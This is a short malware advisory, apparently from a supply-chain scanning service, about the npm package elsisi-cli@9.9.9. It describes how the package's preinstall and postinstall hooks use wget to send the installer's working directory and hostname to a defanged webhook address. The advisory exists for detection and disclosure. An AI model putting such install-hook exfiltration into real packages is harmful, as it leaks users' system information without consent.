LWA-2026-6734 MAL-2026-10551 ↗ confirmed malware

elsisi-cli@9.9.9

Malicious code in elsisi-cli (npm)

T1195.002 · Compromise Software Supply Chain

Analysis

elsisi-cli@9.9.9 is an empty package (only package.json, 371 bytes) with preinstall and postinstall hooks that run `wget --quiet` to webhook[.]site/d5968c3d-d0d7-46c4-9305-a726b24fce9c/?user=$(pwd) and ?user=$(hostname), exfiltrating the installer's current working directory and hostname to a remote endpoint on every install.

analyzed by
Leitwacht
first seen
Jul 14, 2026, 02:46 AM
analyzed
Jul 14, 2026, 02:47 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.